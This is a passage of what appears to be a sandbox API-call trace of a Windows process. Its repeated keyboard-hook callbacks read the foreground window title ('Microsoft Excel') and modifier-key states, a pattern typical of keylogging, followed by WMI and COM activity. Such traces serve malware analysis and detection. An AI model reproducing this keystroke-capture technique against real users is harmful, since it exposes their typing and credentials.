lParam=0x19f304) returned 0x0 [0270.855] WaitMessage () returned 1 [0274.815] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0274.817] GetForegroundWindow () returned 0x903ac [0274.817] GetWindowThreadProcessId (in: hWnd=0x903ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0274.817] GetWindowTextLengthW (hWnd=0x903ac) returned 15 [0274.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238688c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0274.818] GetWindowTextA (in: hWnd=0x903ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0274.819] GetKeyState (nVirtKey=16) returned 0 [0274.819] GetKeyState (nVirtKey=17) returned 0 [0274.819] GetKeyState (nVirtKey=18) returned 0 [0274.819] GetKeyState (nVirtKey=16) returned 0 [0274.819] GetKeyState (nVirtKey=17) returned 0 [0274.819] GetKeyState (nVirtKey=18) returned 0 [0274.819] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0274.826] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0274.827] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0274.889] WaitMessage () returned 1 [0278.845] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0278.846] GetForegroundWindow () returned 0xb03ac [0278.846] GetWindowThreadProcessId (in: hWnd=0xb03ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0278.847] GetWindowTextLengthW (hWnd=0xb03ac) returned 15 [0278.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2387130, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0278.847] GetWindowTextA (in: hWnd=0xb03ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0278.847] GetKeyState (nVirtKey=16) returned 0 [0278.847] GetKeyState (nVirtKey=17) returned 0 [0278.847] GetKeyState (nVirtKey=18) returned 0 [0278.847] GetKeyState (nVirtKey=16) returned 0 [0278.847] GetKeyState (nVirtKey=17) returned 0 [0278.847] GetKeyState (nVirtKey=18) returned 0 [0278.848] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0278.856] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0278.856] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0278.873] WaitMessage () returned 1 [0281.911] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0281.914] GetForegroundWindow () returned 0xd03ac [0281.914] GetWindowThreadProcessId (in: hWnd=0xd03ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0281.914] GetWindowTextLengthW (hWnd=0xd03ac) returned 15 [0281.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2387a74, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.915] GetWindowTextA (in: hWnd=0xd03ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0281.915] GetKeyState (nVirtKey=16) returned 0 [0281.915] GetKeyState (nVirtKey=17) returned 0 [0281.915] GetKeyState (nVirtKey=18) returned 0 [0281.915] GetKeyState (nVirtKey=16) returned 0 [0281.915] GetKeyState (nVirtKey=17) returned 0 [0281.916] GetKeyState (nVirtKey=18) returned 0 [0281.916] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0281.921] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0281.922] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0281.923] WaitMessage () returned 1 [0285.898] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0285.899] GetForegroundWindow () returned 0xf03ac [0285.900] GetWindowThreadProcessId (in: hWnd=0xf03ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0285.900] GetWindowTextLengthW (hWnd=0xf03ac) returned 15 [0285.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2388458, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0285.900] GetWindowTextA (in: hWnd=0xf03ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0285.905] GetKeyState (nVirtKey=16) returned 0 [0285.905] GetKeyState (nVirtKey=17) returned 0 [0285.905] GetKeyState (nVirtKey=18) returned 0 [0285.905] GetKeyState (nVirtKey=16) returned 0 [0285.905] GetKeyState (nVirtKey=17) returned 0 [0285.905] GetKeyState (nVirtKey=18) returned 0 [0285.905] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0285.924] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0285.924] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0285.925] WaitMessage () returned 1 [0289.975] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0289.977] GetForegroundWindow () returned 0x1103ac [0289.977] GetWindowThreadProcessId (in: hWnd=0x1103ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0289.977] GetWindowTextLengthW (hWnd=0x1103ac) returned 15 [0289.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x23891b8, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0289.978] GetWindowTextA (in: hWnd=0x1103ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0289.978] GetKeyState (nVirtKey=16) returned 0 [0289.978] GetKeyState (nVirtKey=17) returned 0 [0289.978] GetKeyState (nVirtKey=18) returned 0 [0289.978] GetKeyState (nVirtKey=16) returned 0 [0289.978] GetKeyState (nVirtKey=17) returned 0 [0289.978] GetKeyState (nVirtKey=18) returned 0 [0289.979] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0289.987] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0289.987] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0290.012] WaitMessage () returned 1 [0293.148] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0293.149] GetForegroundWindow () returned 0x1303ac [0293.149] GetWindowThreadProcessId (in: hWnd=0x1303ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0293.150] GetWindowTextLengthW (hWnd=0x1303ac) returned 15 [0293.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2389cdc, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0293.150] GetWindowTextA (in: hWnd=0x1303ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0293.151] GetKeyState (nVirtKey=16) returned 0 [0293.151] GetKeyState (nVirtKey=17) returned 0 [0293.151] GetKeyState (nVirtKey=18) returned 0 [0293.151] GetKeyState (nVirtKey=16) returned 0 [0293.151] GetKeyState (nVirtKey=17) returned 0 [0293.151] GetKeyState (nVirtKey=18) returned 0 [0293.151] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0293.165] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0293.166] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0293.231] WaitMessage () returned 1 [0297.225] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0297.226] GetForegroundWindow () returned 0x1503ac [0297.226] GetWindowThreadProcessId (in: hWnd=0x1503ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0297.226] GetWindowTextLengthW (hWnd=0x1503ac) returned 15 [0297.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238a8a0, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0297.226] GetWindowTextA (in: hWnd=0x1503ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0297.227] GetKeyState (nVirtKey=16) returned 0 [0297.227] GetKeyState (nVirtKey=17) returned 0 [0297.227] GetKeyState (nVirtKey=18) returned 0 [0297.227] GetKeyState (nVirtKey=16) returned 0 [0297.227] GetKeyState (nVirtKey=17) returned 0 [0297.227] GetKeyState (nVirtKey=18) returned 0 [0297.227] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0297.233] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0297.233] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0297.256] WaitMessage () returned 1 [0300.272] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0300.274] GetForegroundWindow () returned 0x1703ac [0300.274] GetWindowThreadProcessId (in: hWnd=0x1703ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0300.274] GetWindowTextLengthW (hWnd=0x1703ac) returned 15 [0300.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238b578, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0300.274] GetWindowTextA (in: hWnd=0x1703ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0300.275] GetKeyState (nVirtKey=16) returned 0 [0300.275] GetKeyState (nVirtKey=17) returned 0 [0300.275] GetKeyState (nVirtKey=18) returned 0 [0300.275] GetKeyState (nVirtKey=16) returned 0 [0300.275] GetKeyState (nVirtKey=17) returned 0 [0300.275] GetKeyState (nVirtKey=18) returned 0 [0300.276] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0300.290] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0300.290] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0300.294] WaitMessage () returned 1 [0304.407] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0304.408] GetForegroundWindow () returned 0x1903ac [0304.408] GetWindowThreadProcessId (in: hWnd=0x1903ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0304.409] GetWindowTextLengthW (hWnd=0x1903ac) returned 15 [0304.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238c27c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0304.412] GetWindowTextA (in: hWnd=0x1903ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0304.415] GetKeyState (nVirtKey=16) returned 0 [0304.415] GetKeyState (nVirtKey=17) returned 0 [0304.416] GetKeyState (nVirtKey=18) returned 0 [0304.416] GetKeyState (nVirtKey=16) returned 0 [0304.416] GetKeyState (nVirtKey=17) returned 0 [0304.416] GetKeyState (nVirtKey=18) returned 0 [0304.417] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0304.427] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0304.427] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0304.429] WaitMessage () returned 1 [0308.611] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0308.612] GetForegroundWindow () returned 0x1b03ac [0308.612] GetWindowThreadProcessId (in: hWnd=0x1b03ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0308.612] GetWindowTextLengthW (hWnd=0x1b03ac) returned 15 [0308.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238d020, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0308.613] GetWindowTextA (in: hWnd=0x1b03ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0308.640] GetKeyState (nVirtKey=16) returned 0 [0308.640] GetKeyState (nVirtKey=17) returned 0 [0308.640] GetKeyState (nVirtKey=18) returned 0 [0308.640] GetKeyState (nVirtKey=16) returned 0 [0308.640] GetKeyState (nVirtKey=17) returned 0 [0308.640] GetKeyState (nVirtKey=18) returned 0 [0308.640] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0308.651] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0308.651] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0308.652] WaitMessage () Thread: id = 61 os_tid = 0x1174 Thread: id = 62 os_tid = 0x116c Thread: id = 63 os_tid = 0x1168 [0147.892] CoGetContextToken (in: pToken=0x434fc74 | out: pToken=0x434fc74) returned 0x800401f0 [0147.893] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0147.893] RoInitialize () returned 0x1 [0147.893] RoUninitialize () returned 0x0 [0183.101] CoGetContextToken (in: pToken=0x434fc60 | out: pToken=0x434fc60) returned 0x0 [0183.101] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.101] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x1 [0183.101] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x0 [0183.101] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.101] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x1 [0183.101] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x0 [0183.101] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.101] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x1 [0183.101] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x1 [0183.102] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemDefPath:IUnknown:Release (This=0x5946d0) returned 0x1 [0183.102] WbemDefPath:IUnknown:Release (This=0x5946d0) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemDefPath:IUnknown:Release (This=0x594740) returned 0x1 [0183.102] WbemDefPath:IUnknown:Release (This=0x594740) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemDefPath:IUnknown:Release (This=0x5943c0) returned 0x1 [0183.102] WbemDefPath:IUnknown:Release (This=0x5943c0) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fc60 | out: pToken=0x434fc60) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemLocator:IUnknown:Release (This=0x596da8) returned 0x1 [0183.102] WbemLocator:IUnknown:Release (This=0x596da8) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fbe0 | out: pToken=0x434fbe0) returned 0x0 [0183.102] WbemLocator:IUnknown:Release (This=0x596d08) returned 0x1 [0183.102] WbemLocator:IUnknown:Release (This=0x596d08) returned 0x0 [0183.102] CoGetContextToken (in: pToken=0x434fc60 | out: pToken=0x434fc60) returned 0x0 [0183.102] IUnknown:QueryInterface (in: This=0x524090, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x434fc04 | out: ppvObject=0x434fc04*=0x5240a0) returned 0x0 [0183.103] CObjectContext::ContextCallback () returned 0x0 [0184.315] IUnknown:Release (This=0x5240a0) returned 0x1 [0184.316] CoGetContextToken (in: pToken=0x434faa8 | out: pToken=0x434faa8) returned 0x0 [0184.316] IUnknown:QueryInterface (in: This=0x524090, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x434fa4c | out: ppvObject=0x434fa4c*=0x5240a0) returned 0x0 [0184.316] CObjectContext::ContextCallback () returned 0x0 [0184.335] IUnknown:Release (This=0x5240a0) returned 0x1 [0184.336] IUnknown:Release (This=0x517c98) returned 0x0 [0184.337] IUnknown:Release (This=0x57ca60) returned 0x0 [0184.337] CoGetContextToken (in: pToken=0x434faa8 | out: pToken=0x434faa8) returned 0x0 [0184.337] IUnknown:QueryInterface (in: This=0x524090, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x434fa4c | out: ppvObject=0x434fa4c*=0x5240a0) returned 0x0 [0184.338] CObjectContext::ContextCallback () returned 0x0 [0184.360] IUnknown:Release (This=0x5240a0) returned 0x1 [0184.360] IUnknown:Release (This=0x524090) returned 0x0 [0184.361] IUnknown:Release (This=0x5a5978) returned 0x0 [0184.362] CloseHandle (hObject=0x46c) returned 1 [0184.362] CloseHandle (hObject=0x468) returned 1 [0184.362] CloseHandle (hObject=0x464) returned 1 [0184.362] RegCloseKey (hKey=0x4b4) returned 0x0 [0184.363] CloseHandle (hObject=0x45c) returned 1 [0184.363] CloseHandle (hObject=0x458) returned 1 [0184.363] CloseHandle (hObject=0x260) returned 1 [0184.363] CloseHandle (hObject=0x25c) returned 1 [0184.363] CloseHandle (hObject=0x258) returned 1 [0184.363] CloseHandle (hObject=0x254) returned 1 [0184.364] CloseHandle (hObject=0x454) returned 1 [0184.364] CloseHandle (hObject=0x250) returned 1 [0184.364] CloseHandle (hObject=0x24c) returned 1 [0184.364] CloseHandle (hObject=0x43c) returned 1 [0184.364] CloseHandle (hObject=0x248) returned 1 [0184.364] CloseHandle (hObject=0x438) returned 1 [0184.364] CloseHandle (hObject=0x434) returned 1 [0184.365] CloseHandle (hObject=0x244) returned 1 [0184.365] CloseHandle (hObject=0x430) returned 1 [0184.365] CloseHandle (hObject=0x3e0) returned 1 [0184.365] CloseHandle (hObject=0x3dc) returned 1 [0184.365] CloseHandle (hObject=0x3a4) returned 1 Thread: id = 64 os_tid = 0x115c Thread: id = 65 os_tid = 0x1170 Thread: id = 66 os_tid = 0x1164 Thread: id = 163 os_tid = 0x11b8 [0157.076] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0157.076] RoInitialize () returned 0x1 [0157.076] RoUninitialize () returned 0x0 [0157.105] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x4e0f5bc | out: lpiid=0x4e0f5bc) returned 0x0 [0157.122] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596cf8) returned 0x0 [0157.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x596cf8, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0157.123] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596cf8, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f4f0 | out: ppvObject=0x4e0f4f0*=0x594660) returned 0x0 [0157.123] WbemDefPath:IUnknown:Release (This=0x596cf8) returned 0x0 [0157.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0f114 | out: ppvObject=0x4e0f114*=0x594660) returned 0x0 [0157.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4e0f0d0 | out: ppvObject=0x4e0f0d0*=0x0) returned 0x80004002 [0157.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4e0ecc4 | out: ppvObject=0x4e0ecc4*=0x0) returned 0x80004002 [0157.124] WbemDefPath:IUnknown:AddRef (This=0x594660) returned 0x3 [0157.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4e0ea24 | out: ppvObject=0x4e0ea24*=0x0) returned 0x80004002 [0157.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4e0e9d4 | out: ppvObject=0x4e0e9d4*=0x0) returned 0x80004002 [0157.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0e9e0 | out: ppvObject=0x4e0e9e0*=0x59aa60) returned 0x0 [0157.124] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x59aa60, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4e0e9e8 | out: pCid=0x4e0e9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.124] WbemDefPath:IUnknown:Release (This=0x59aa60) returned 0x3 [0157.124] CoGetContextToken (in: pToken=0x4e0ea40 | out: pToken=0x4e0ea40) returned 0x0 [0157.125] CoGetContextToken (in: pToken=0x4e0ee48 | out: pToken=0x4e0ee48) returned 0x0 [0157.125] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e0eed4 | out: ppvObject=0x4e0eed4*=0x0) returned 0x80004002 [0157.125] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x2 [0157.125] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x1 [0157.125] SetEvent (hEvent=0x3a4) returned 1 [0157.137] CoGetClassObject (in: rclsid=0x587b34*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x694f4d80*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4e0f2c8 | out: ppv=0x4e0f2c8*=0x596c98) returned 0x0 [0157.138] WbemDefPath:IUnknown:QueryInterface (in: This=0x596c98, riid=0x694d79fc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4e0f4e4 | out: ppvObject=0x4e0f4e4*=0x0) returned 0x80004002 [0157.138] WbemDefPath:IClassFactory:CreateInstance (in: This=0x596c98, pUnkOuter=0x0, riid=0x693ade2c*(Data1=0x0, 